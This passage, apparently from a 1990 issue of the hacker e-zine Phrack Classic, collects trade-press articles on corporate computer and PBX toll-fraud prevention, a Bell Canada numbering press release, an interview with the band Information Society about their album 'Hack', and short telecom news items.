  6850. people, who are in high demand, might leave for other jobs if security becomes
  6851. too cumbersome.
  6852.  
  6853. Expense is another factor.  Serious security measures at a large installation
  6854. can cost an average of $100,000, though a smaller company can be helped for
  6855. about $10,000, said Trevor Gee, partner at consulting company Deloitte and
  6856. Touche.
  6857.  
  6858. "They hear all the rumors, but unless you illustrate very specific savings,
  6859. they are reluctant," Gee said.
  6860.  
  6861. Proving cost savings is difficult unless the company already has been hit by
  6862. computer crime.  But those victims, some of whom have suffered losses in the
  6863. millions, are usually security experts' best customers, consultants say.
  6864.  
  6865. Much of the vulnerability to computer crime comes simply from lax security.
  6866. Access is not restricted.  Doors are not locked.  Passwords are easily guessed,
  6867. seldom changed and shared with several workers.  And even these basic security
  6868. measures are easy to put off.
  6869.  
  6870. "You hear a lot of, `We haven't gotten around to changing the password because.
  6871. .  .," Roy Alzua, telecommunications security program manager at Rockwell
  6872. International, told the security conference.
  6873.  
  6874. So what should companies do to plug the gaping security holes in their
  6875. organizations?
  6876.  
  6877. Consultants say that top management first has to make a commitment that
  6878. everyone in the operation takes seriously.
  6879.  
  6880. "I've seen companies waste several hundreds, if not thousands, of dollars
  6881. because management was not behind the program," Deloitte & Touche's Gee said.
  6882. "As a result, MIS (management information systems) professionals have a tough
  6883. time" pressing for more security.
  6884.  
  6885. Once top executives are convinced that there is a need for tighter security,
  6886. they must establish policies and procedures, consultants say.  Gee suggests
  6887. that in addition to training programs, reminders should be posted.  Such issues
  6888. as whether employees are allowed to use computers for personal projects should
  6889. be tackled.
  6890.  
  6891. Management also should decide what systems and information need to be secured.
  6892.  
  6893. "They need to zero in on the information they are really concerned about," said
  6894. Gregory Therkalsen, national director of information security services for
  6895. consultants Ernst & Young.  "About 95 percent of the information in the average
  6896. company nobody cares about."
  6897.  
  6898. Before tackling complicated security systems, companies should pay attention to
  6899. the basics.
  6900.  
  6901. "Lock a door.  It's as easy as that," Alzua said.
  6902.  
  6903. Companies should make sure that the passwords that come with their computers
  6904. are changed.  And then employees should not use common words or names that are
  6905. easy to guess.  Using a combination of numbers and letters, although difficult
  6906. to remember, is more secure.
  6907.  
  6908. Another basic measure is to have a system that automatically checks the
  6909. authorization of someone who dials into the company's computers from the
  6910. outside.
  6911.  
  6912. Then, companies should develop an electronic audit trail so that they know who
  6913. is using the system and when.  And companies should always take the time to
  6914. make backups of their computer files and store them in a place safe from fire
  6915. and flood.
  6916.  
  6917. A wide variety of software is available to help companies protect themselves.
  6918. Some automatically encode information entered into the system.  Others detect
  6919. viruses.
  6920.  
  6921. For a more sophisticated approach, LeeMah Datacom has a system that blocks a
  6922. computer tone from the telephone line until the correct access code is entered.
  6923. The company has held contests challenging hackers to break into its system.  No
  6924. one has, the company said.
  6925.  
  6926. SRI is developing a system that would monitor computer activity around the
  6927. clock with the supervision of a security guard.  SRI is implementing the system
  6928. for the FBI and plans to make it a commercial product.
  6929.  
  6930. No company would want to have a perfectly secure system, consultants say.  That
  6931. would mean shutting out most employees and staying off networks that can make
  6932. operations more efficient.
  6933.  
  6934. While still balancing the need for openess, however, there is much that can be
  6935. done to prevent computer crime.  And although there is no perfect solution,
  6936. companies don't need to stand by waiting to become the next victim.
  6937.  
  6938. _______________________________________________________________________________
  6939.  
  6940.  
  6941. HEADLINE  BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME CUSTOMERS
  6942. DATE      09/26/90
  6943. SOURCE    CANADA NEWS-WIRE   (CNW)
  6944.           Contact:  For further information, contact: Irene Colella (416)
  6945.           581-4266; Geoff Matthews, Bell Canada (416) 581-4205. CO: Bell Canada
  6946.           SS: IN: TLS
  6947.           Origin:   TORONTO
  6948.           Language: ENGLISH; E
  6949.           Day of Week: Wed
  6950.           Time:        09:56 (Eastern Time)
  6951.           (Copyright Canada News-Wire)
  6952. RE        CN
  6953.           ---    BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME
  6954.                                     CUSTOMERS                            ---
  6955.  
  6956. TORONTO - Bell Canada's new look telephone numbers in Southern Ontario are
  6957. causing puzzlement among some customers in the 416 area code.
  6958.  
  6959. In late 1988 Bell found itself running short of telephone numbers in the Golden
  6960. Horseshoe because of rapid business and residential growth as well as the
  6961. increasing popularity of cellular telephones, fax machines and new services
  6962. like Ident-A-Call.
  6963.  
  6964. To accommodate continuing growth, the company had to come up with a means of
  6965. creating new number combinations.  The solution was found by assigning local
  6966. exchanges made up of combinations which had previously been reserved as area
  6967. codes elsewhere in North America.
  6968.  
  6969. Until March of this year the three numbers (known as a central office code)
  6970. which begin a telephone number never had a zero or a one as the second digit.
  6971. Anything from two through nine could appear in that position, but combinations
  6972. with zero or one were used only as area codes.  But with more than four million
  6973. telephone numbers in use throughout the Golden Horseshoe Bell was simply
  6974. running out of the traditional central office code combinations.  By creating
  6975. new central office codes such as 502, 513, 602 and 612, the company has access
  6976. to up to one million new telephone numbers.
  6977.  
  6978. Some customers, however, have found the new numbers a little confusing.  When
  6979. the new numbers were introduced last March, Bell mounted an extensive
  6980. advertising campaign telling customers throughout the 416 area code to dial 1
  6981. plus 416 or 0 plus 416 for all long distance calls within the area code in
  6982. order to ensure calls to these numbers could be completed.
  6983.  
  6984. Bell spokesman Geoff Matthews says that while the ad campaign was extremely
  6985. effective in changing dialing habits, a number of customers are scratching
  6986. their heads when they first see the new telephone numbers.
  6987.  
  6988. ``In some cases we are finding that business customers have not programmed
  6989. their telephone equipment to permit dialing the new numbers,'' Matthews said,
  6990. ``but some people think it is simply a mistake when they see a telephone number
  6991. beginning with 612 for example.  Most are satisfied once they have received an
  6992. explanation.''
  6993.  
  6994. Creating the million new telephone numbers should see Bell Canada through
  6995. several years, Matthews said, after which a new area code will be introduced.
  6996.  
  6997. The 416 area code is the first in Canada to reach capacity.  A number of U.S.
  6998. cities have faced a similar situation, Matthews said, and have introduced
  6999. similar number plans.
  7000.  
  7001. Bell Canada, the largest Canadian telecommunications operating company, markets
  7002. a full range of state-of-the-art products and services more than seven million
  7003. business and residence customers in Ontario, Quebec and part of the Northwest
  7004. Territories.
  7005.  
  7006. Bell Canada is a member of Telecom Canada -- an association of Canada's major
  7007. telecommunications companies.
  7008.  
  7009.  
  7010. For further information, contact:  Irene Colella (416) 581-4266; Geoff
  7011. Matthews, Bell Canada (416) 581-4205.
  7012.  
  7013. _______________________________________________________________________________
  7014.  
  7015.  
  7016. HEADLINE  Keeping The PBX Secure
  7017.           Byline:   Bruce Caldwell
  7018. DATE      10/15/90
  7019.           Issue:    291
  7020.           Section:  TRENDS
  7021.           Page:     25
  7022.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  7023.  
  7024. Preventing toll fraud through the corporate PBX can be as simple, albeit
  7025. inconvenient, as expanding access codes from four digits to 14.  "When we had
  7026. nine-digit codes, we got hurt bad," says Bob Fox of US Sprint Communications
  7027. Co., referring to the phone company's credit card numbers.  "But when we moved
  7028. to 14-digit codes and vigorous prosecution, our abuse dropped off the table."
  7029.  
  7030. At most companies, the authorization code for remote access, used by employees
  7031. to place calls through the corporate PBX while away from the office, is only
  7032. four digits.  Many companies are "hung up on the four-digit authorization
  7033. code," says Fox, mainly because it's easier for the executives to remember.
  7034. But all it takes a hacker to crack open a four-digit code is about 20 minutes.
  7035.  
  7036. To help their customers cope with PBX abuse, MCI Communications Corp.  has
  7037. prepared a tip sheet describing preventative measures (see accompanying chart).
  7038. PBX fraud may display itself in a particular pattern:  The initial stage will
  7039. show a dramatic increase in 950-outbound and 800-outbound services, which allow
  7040. a surreptitious user to "cover his tracks" by jumping from one carrier to
  7041. another-a technique known as "looping." In time, knowledge of the unsecured
  7042. system may become widespread, resulting in heavy use of services connected with
  7043. normal telecommunications traffic.
  7044.  
  7045. Customers are advised to audit systems for unusual usage and to change codes on
  7046. a regular basis.  Steady tones used as prompts to input access codes should be
  7047. avoided, because that is what hacker-programmed computers look for.  Instead,
  7048. MCI advises use of a voice recording or no prompt at all, and recommends
  7049. automatic termination of a call or routing it to a switchboard operator
  7050. whenever an invalid code is entered.
  7051.  
  7052. An obvious source of help is often overlooked.  Explains Jim Snyder, an
  7053. attorney in MCI's office of corporate systems integrity, "The first thing we
  7054. tell customers is to contact their PBX vendor to find out what kind of
  7055. safeguards can be built into the PBX."
  7056.  
  7057. _______________________________________________________________________________
  7058.  
  7059.  
  7060. HEADLINE  WATCH YOUR PBX
  7061.           Column:   Database
  7062. DATE      04/02/90
  7063. SOURCE    COMMUNICATIONSWEEK   (CWK)
  7064.           Issue:    294
  7065.           Section:  PRN
  7066.           Page:     24
  7067.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  7068.  
  7069. Many managers of voice systems would be "horrified" if they realized the low
  7070. levels of security found in their PBXs, according to Gail Thackeray, an
  7071. assistant attorney general for the state of Arizona.  Thackeray made her
  7072. comments to a group of financial users at a computer virus clinic held by the
  7073. Data Processing Management Association's Financial Industries chapter.
  7074. Thackeray, who investigates computer crimes, said that PBXs often are used by
  7075. network criminals to make free long distance phone calls at the expense of the
  7076. companies that own the PBXs.  "PBX owners are often unaware that if $500,000
  7077. worth of fraud comes from your PBX, the local carrier is not going to absorb
  7078. that loss," she said.
  7079.  
  7080. The PBX also is often the first source of break-in by computer hackers, who use
  7081. the free phone service to get into a user's data system, she said.  "PBXs are
  7082. the prime method for international toll fraud and hackers attacking and hiding
  7083. behind your corporate identity," Thackeray said.
  7084.  
  7085. Richard Lefkon, Citicorp's network planner and president of DPMA's financial
  7086. industries chapter, said users are more likely to take steps toward protecting
  7087. a PBX than a network of microcomputers.  "A PBX is expensive, so if you add 15
  7088. to 20 percent to protect it, it's a justifiable expenditure," Lefkon said.  "If
  7089. you have a PC which costs a couple of thousand dollars, unless you think you're
  7090. special, you are going to think twice before investing several hundred dollars
  7091. per PC to protect them."
  7092.  
  7093. _______________________________________________________________________________
  7094.  
  7095.  
  7096.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  7097.  
  7098.                               K N I G H T L I N E
  7099.  
  7100.                            Issue 03/Part III of III
  7101.  
  7102.                             17th of November, 1990
  7103.  
  7104.                               Written, compiled,
  7105.  
  7106.                            and edited by Doc Holiday
  7107.  
  7108.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  7109.  
  7110.                                       ---
  7111.  
  7112.      What is this?  Information Society's new album is called "HACK"?  Just
  7113. what do these guys know about hacking?  How did they come up with the album
  7114. title?  Why are they taking such an interest in the Computer Underground?
  7115.  
  7116.      Knightline got the chance to ask Kurt Valaquen of InSoc about the new
  7117. album and his involvement with the CU.
  7118.  
  7119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7120.  
  7121. RINGing New York .. .
  7122.  
  7123. KV: Hello
  7124. Me: Kurt?
  7125. KV: Yes, Doc ?
  7126. Me: Yea, you ready for the interview?
  7127. KV: Sure, shoot.
  7128. Me: Okay, this is DH with Phrack Classic--
  7129. TC: This is the Conflict
  7130. PH: And this is Pain Hertz
  7131. KV: I uh, hope you ask me what my hacker handle is..
  7132. Me: Ok, what's your handle?
  7133. KV: Because I believe that I have one of the coolest hacker's handles that I've
  7134.     ever heard.
  7135. TC: uhh
  7136. Me: What is it?
  7137. KV: TRAPPED VECTOR.
  7138. Me: "Trapped Vector" ?
  7139. KV: yep
  7140. Me: How did you come up with that?
  7141. KV: What? You don't recognize it ?
  7142. Me: haha
  7143. KV: What.. . and you guys call yourselves hackers?
  7144. Me: ah
  7145. KV: My god. . you guys must be so young that you've never had to deal with
  7146.     assembly language.
  7147. Me: Who would want to-- It was a sarcastic question..
  7148. Me: Now, Kurt..
  7149. KV: Trapped Vector is a term from deep deep down in the functioning's of a CPU.
  7150. Me: Right.
  7151. Me: Uh, uh What kind of involvement, if any, have you had in the
  7152.     telecommunications field?
  7153. KV: In telecommunications what?
  7154. Me: In the telecommunications field.
  7155. KV: Uhh.. I majored in computer science at the University of Minnesota.. . Just
  7156.     long enough to get interested and not long enough to get a degree.
  7157. Me: ah. So you didn't graduate?
  7158. KV: No. After my 5th year I finally gave up and went to Vienna.
  7159. Me: Uhh. Let's get into the new album .. uh now, what was the inspiration for
  7160.     involving the "hacking" theme in your new album?
  7161. KV: Umm, well, it's not like we were inspired to do it -- and we sat around all
  7162.     day and said "Hey, let's like put this hacker's moltese into it." -- it's
  7163.     more like we just left all that stuff out on our first album because we
  7164.     were trying to .. uh.. to not make any waves, since it was our first album.
  7165.     And now were cocky and think we can do whatever we want.  So we just did
  7166.     whatever we wanted. And whenever we do whatever we want, some of that
  7167.     stuff inevitably creeps in because .. were into it.
  7168. Me: uhh.. have you been following all of the recent hacking busts that have
  7169.     plagued the country this year .. ?
  7170. KV: Hacking "buzz" that has plaged.. .
  7171. Me: BUSTS.. yea hacking busts..
  7172. KV: Oh, I haven't been following it, but I've been hearing a little bit about
  7173.     it from my friends..
  7174. Me: Yea, because your album comming out titled "HACK" really does tie in
  7175.     with this time period of hackers getting alot of press..
  7176. KV: Yea
  7177. Me: And I just thought that could have been one of the inspirations.. .
  7178. KV: Well, actually, believe it or not, we don't really know what it means to
  7179.     title an album "HACK".  We have a list of about nine different
  7180.     interpretations that we thought we could leave open and anyone else could
  7181.     decide which is the real one and strangley (Gruhm) the computer hacker
  7182.     concept is pretty far down on our list.  The first one we always think of
  7183.     is uh.. the hack versus .. uh.. respected professional-- meaning-- like,
  7184.     you know, their just hack, he's just a hack writer.. .
  7185. Me: Right.
  7186. KV: Their just hack musicians-- because uh, I guess we wanted to be
  7187.     self-deprecating in a sarcastic and easily marketable way.
  7188. Me: Yea..
  7189. Me: What about your personal involvement in the Computer Underground? Is there
  7190.     one? With hackers?
  7191. KV: Well, umm.. if I were not being a "pop tart" (which is our personal lingo
  7192.     for rock star) I would probably be trying to make my money off of
  7193.     programming.
  7194. Me: Aaah!
  7195. KV: Ummm, however.. that's not the case.. I am trying to be a "pop tart" so my
  7196.     involvement is more limited that I would like it to be.  I mean I do all my
  7197.     work on IBM.. When I'm composing..
  7198. Me: Hm, Kurt, what are your thoughts and attitudes toward hackers and hacking?
  7199. KV: Umm,  this is my thoughts and attitudes towards it:  I am somebody who --
  7200.     always. . always -- like when I had that telephone job, I just was, I
  7201.     hardly did any work.  I just spent the whole time trying to come up with
  7202.     tricky things to do you know.  Like I'd screw up other people's phone calls
  7203.     and stuff and so like I'm way into it.  And I understand why people want to
  7204.     do it.  BUT, I always kinda, knew that I just .. . shouldn't.  Just because
  7205.     it's stupid.. It was childish.  And, I just wish that hackers could come up
  7206.     with something better to do than get things without paying for them.
  7207. PH: Like something more productive?
  7208. KV: Yea, like .. uh.. umm, crash some sort of umm, killing organization's
  7209.     computer system.
  7210. Me: Have you always had these thoughts or..just because of your popularity?
  7211. KV: Umm, I've had this attitude as I got older, because .. um, I'm just
  7212.     becomming really bored with people devoting all this intelligence and
  7213.     motivation into like avoiding paying their phone bill.
  7214. TC: Well, actually, that's getting away from the hacker as such. Because alot
  7215.     of hackers are really into systems more than their into .. you know, toll
  7216.     fraud.
  7217. KV: Well I sure hope so..
  7218. TC: Yea, I mean..
  7219. KV: My Idea of great hacking is gathering information that other people are
  7220.     wronmgfully trying to withhold.
  7221. TC: Right.
  7222. KV: But, most hacking to me seems to be petty ways of getting things without
  7223.     paying for them.. and that is just silly.
  7224. Me: That is the "90's hackers" Kurt.
  7225. PH: Yea, it's moving that way alot..
  7226. Me: It's in that direction.
  7227. Me: Tell us about the telephone job you mentioned?
  7228. KV: Well, I worked at a market research place.  You all know what that is-- you
  7229.     call up and say, "Hello, my name is Kurt and Im calling for marketing
  7230.     incentives incorporated, and we are conducting a survey in your area
  7231.     tonight... about toothpaste!"
  7232. PH: Hah
  7233. TC: ahha
  7234. Me: Bahaha
  7235. KV: "And I would like to know if I could ask you a few questions?" .. "What! I
  7236.     don't wanna buy no toothpaste!" .. "No we were just going to ask a few
  7237.     questions.." -- Ewwwwph..
  7238. KV: Like... you would try to come up with ways to not make the phone calls
  7239.     because it was so painful to do.
  7240. TC: heh
  7241. KV: The best thing was when I umm. . this was a time when I didn't know much
  7242.     about telephones.. or how they really worked.. umm. . but I managed to run
  7243.     a little thing-- wires with alligator clips --uhh, from the phone that I
  7244.     was at to the central switcher.  And uhh, whenever I like got up to goto
  7245.     the bathroom, or something, I'd go in there, and by connecting and shorting
  7246.     the two wires out I'd break up someone's phone call.
  7247. PH: ha
  7248. KV: You know, but after a while, I thought to myself, WHY? I wish I could have
  7249.     pulled something more creative like umm.. . installing a uhh.. a pitch
  7250.     transposer on the outgoing signals, so that the people on the other end of
  7251.     the phone would hear, "AND NOW, I WOULD LIKE TO ASK YOU: HOW DO YOU FEEL
  7252.     ABOUT COLEGATE?"
  7253. Me: Bahaha
  7254. TC: ahha
  7255. PH: heh!
  7256. KV: That would have been funny-- aha.
  7257. KV: But, I never did that..
  7258. Me: Hmm, Do you know any other bands that are involved or interested in the
  7259.     computer underground?
  7260. KV: No, I don't know that there are any-- most uh musicians are either
  7261.     anti-tech or if they are into tech they arnt into it enough-- or they arn't
  7262.     into it for it's own sake.  Like, like hackers.
  7263. Me: Did you guys have any problems with the title of your new album?
  7264. KV: Like what do you mean?
  7265. Me: Well, do you find that most of your fans think you guys are into the
  7266.     "hacking scene" because of the title?
  7267. KV: They can think of it anyway they want-- it a bunch of different meanings.
  7268. KV: Like uh, one member of the band thinks of it refering to him being a cook
  7269.     and he likes to cut up meat.
  7270. Me: Hah
  7271. TC: heh
  7272. TC: What about like on the 12" with the "BlueBox 2600" mix and the
  7273.     "Phone Phreakers" mix?
  7274. KV: What about it?
  7275. TC: Yea.. uh
  7276. KV: And the Virtual Reality mix?
  7277. TC: Yea, has that uh.. have you heard anything about that?
  7278. KV: Umm, no people in large just don't notice.  I mean when your a hacker, I
  7279.     mean you kind of forget how little people know.  But it's unbelieveable how
  7280.     much people don't know.  And I'm sure one person in a thousand thinks that
  7281.     those are anything other than, "Oh another wacky mix name!"
  7282. Me: Baha
  7283. KV: Most mix names are just inside jokes-- so most people don't bother trying
  7284.     to understand them.
  7285. TC: Right.
  7286. KV: Umm, basically the only thing that has happened is that people have umm..
  7287.     really responded to the concept of uhh.. us trying to tie into computer
  7288.     hacking-- way more than we were really trying to.  We just wanted it to be
  7289.     a reference.  And the people around us are kinda pushing us into it being a
  7290.     theme.  Were not really prepared for that.  Because, while were into it, of
  7291.     the three of us, Im the only one who can hold down a conversation about
  7292.     tech.  And even I have to move over and admit that I am not ane expert
  7293.     hacker.  I just dont know enough.  Like.. Uh.. I know what an FAT is, but
  7294.     I wouldn't know how to rewrite it.
  7295. TC: Well, that's another thing.  Do you make a distinction between hacker as
  7296.     someone who breaks into computers or a hacker who is an intense system
  7297.     programmer?
  7298. KV: Do I make that distinction?
  7299. TC: Yea.
  7300. KV: Umm.. No.. Im not involved enough in the hacker world to make that
  7301.     distinction.
  7302. Me: Do you have anything you want to say to the computer underground?
  7303. KV: Umm.. .yes let me think. . "Roller-skating is not a crime".
  7304. TC: Hah
  7305. PH: ah!
  7306. KV: You know that I live on skates don't you?
  7307. PH: Well on the album cover your wearing skates.. next to that car ... with
  7308.     your..
  7309. KV: My teledestruction gear!
  7310. KV: And, I have to add a grain of salt to the phrase "Hackers of the world
  7311.     unite" thats on our album cover..
  7312. PH: Right.
  7313. KV: We didn't actually intend it to be a huge banner.. it was suppose to be a
  7314.     tiny little comment on the side.. and our label misunderstood our
  7315.     intentions for that.  We didn't think it was quite good enough to have it
  7316.     be a huge .. in such huge print.
  7317. Me: Hmm
  7318. KV: Not a grain of salt.. A tounge and a cheek.
  7319. TC: hehe
  7320. <SILENCE>
  7321. Me: Well, I guess thats about it.. Do you have anything you wanna sum up with?
  7322. KV: Umm..
  7323. <SILENCE>
  7324. Me: Uh, Kurt, do you have an Email address somewhere?
  7325. KV: AH, well, Im embarrassed to say it but only on Prodigy.
  7326. TC: HAH
  7327. Me: Bahah!
  7328. PH: Heh
  7329. Me: Okay.. Well, if that's it..
  7330. KV: Wait.  I do know something I can sum up with..
  7331. KV: Please.. In the case of our album try to overcome your instinct of hacker
  7332.     tendancies and buy an original disk rather than just waiting for a copy..
  7333. KV: Ok?
  7334. Me: Hah
  7335. KV: We need the money.
  7336.  
  7337. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7338.  
  7339. [The following is a press release for InSoc's new LP. --DH]
  7340.  
  7341.                                  INFORMATION
  7342.                                    SOCIETY
  7343.  
  7344.  
  7345. "Hackers have no regard for conventional wisdom.  We have no regard for
  7346. musical conventions..."
  7347.  
  7348.                                 --  Paul Robb
  7349.  
  7350.  
  7351. "Hack has multiple meanings, some of them self-deprecating.  You can't
  7352. take any of this too seriously or you've missed the point.  It's about
  7353. a playful use of technology, about breaking codes.  It's a post-modern
  7354. aesthetic that comes through in our music..."
  7355.  
  7356.                                 --  James Cassidy
  7357.  
  7358.  
  7359. "After having devised, erased and blotted out many other names, we
  7360. finally decided to call our album _Hack_  --  a name that, in our
  7361. opinion, is lofty, sonorous and significant.  It explains that we had
  7362. been only ordinary hacks before we had been raised to our present status
  7363. as first of all hacks in the world..."
  7364.  
  7365.                                 --  Kurt Valaquen
  7366.  
  7367.  
  7368. There you have it...as complete a definition of the vision of _Hack_ as
  7369. you're likely to get short of actually listening to Information
  7370. Society's superb new album of the same name.  And if, after reading the
  7371. trio's treatises on the term, you suddenly have a clear understanding of
  7372. what the meaning behind _Hack_ really is, then something's gone wrong.
  7373. _Hack_ is more than the definition.  It's a way of life.  With its own
  7374. soundtrack.
  7375.  
  7376. "We're musical hackers of the first order," continues InSoc's Paul Robb.
  7377. "What we do is similiar to computer hackers breaking into sophisticated
  7378. systems to wreak havoc."
  7379.  
  7380. "Our music is really different from other progressive styles," adds
  7381. James Cassidy.  "It's funnier and scarier...a mix of pure pop and sub-
  7382. versive stuff underneath the surface."
  7383.  
  7384. TOMMY BOY MUSIC, INC.    1747 1ST AV. NY, NY 10128       (212) 722-2211
  7385.  
  7386. _______________________________________________________________________________
  7387.  
  7388.                               N E W S * B O L T S
  7389.  
  7390.                                     {A - G}
  7391. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7392. A>      Four direct telephone circuits linking Seoul to Moscow were set to open
  7393. at midnight last night.  South Korea's Communication Ministry said telephone
  7394. calls between South Korea and the Soviet Union have jumped from four calls in
  7395. all of 1987 to some 5,000 a month this year.
  7396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7397. B>      In the latest issue of IEEE Spectrum (November, 1990), on pages
  7398. 117-119, there's an interesting article entitled "The Great Blue Box Phone
  7399. Frauds", subtitled "Until the phone company separated signaling information
  7400. from the voice signal, long-distance calls could be made without charge by
  7401. anyone who could whistle at 2600 hertz."
  7402.  
  7403. It even has the illustration from the June 1972 "Ramparts" magazine, showing
  7404. how to constuct a "black box" to prevent the calling party from being billed
  7405. for the call.
  7406.  
  7407. There's also a list of about five or six other references at the end
  7408. of the article which sound interesting.
  7409. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7410. C>      Registering for AT&T Mail on-line:  make a modem call to 1 800 624 5123
  7411. (2400, 1200, or 300 baud, 8 bit, no parity); give one (or more) <CR>'s; and at
  7412. the login prompt, type REGISTER followed by another <CR>.  The system will walk
  7413. you through its on-line registration procedure.  Have a creditcard number or
  7414. EFT number handy.  You can back out at any time with a ^C (<cntrl>-C) and a
  7415. QUIT.
  7416.  
  7417. A couple further AT&T Mail features:
  7418.  
  7419. "Mail Talk" permits retrieval of messages w/o a terminal from any DTMF phone --
  7420. text messages get "spoken" by a synthesized voice; and there are "Autoanswer"
  7421. and "Autoresponse" options permitting fairly flexible automatic response to
  7422. either all or selected incoming messages.
  7423. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7424. D>      Detroit, Michigan time 313-472-1212.  May soon be replaced with
  7425. a 900 number that charges.
  7426. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7427. E>      In Australia, the hacker known as Phoenix was charged with Defrauding
  7428. the Commonwealth, Conspiracy to Commit Treason, and Conspiracy to Commit
  7429. Murder.  The United States has sent representatives from the Federal Bureau of
  7430. Investigation (FBI) and the Computer Emergency Response Team (CERT) overseas to
  7431. help investigate the situation and aid in prosecution of Phoenix.  In the
  7432. meantime, the "eccentric" Phoenix is maintaining ties to hacker friends in the
  7433. USA by use of the Internet.
  7434. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7435. F>      Bellcore reports that we have only 9 unused area codes.  The current
  7436. system of generating the codes was supposed to last 100-200 years.  Not to
  7437. worry, a representative at the Bell organization says a new plan is already in
  7438. the works.  The new system consists of replacing the 2nd digit (either 0 or 1)
  7439. with a number between 2 and 9.  Bellcore says the new plan should last 200 more
  7440. years. Hm.
  7441. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7442. G>      A new BBS has been set up for a communication flow between hackers,
  7443. fed, and journalists.  713.242.6853  Instant validation for all.  The BBS is
  7444. called FACE to FACE.
  7445. _______________________________________________________________________________
  7446.  
  7447. *** END OF PHRACK CLASSIC 32; Email: pc@well.ca.sf.us
  7448. -------------------------------------------------------------------------------
  7449.  
  7450.  
  7451.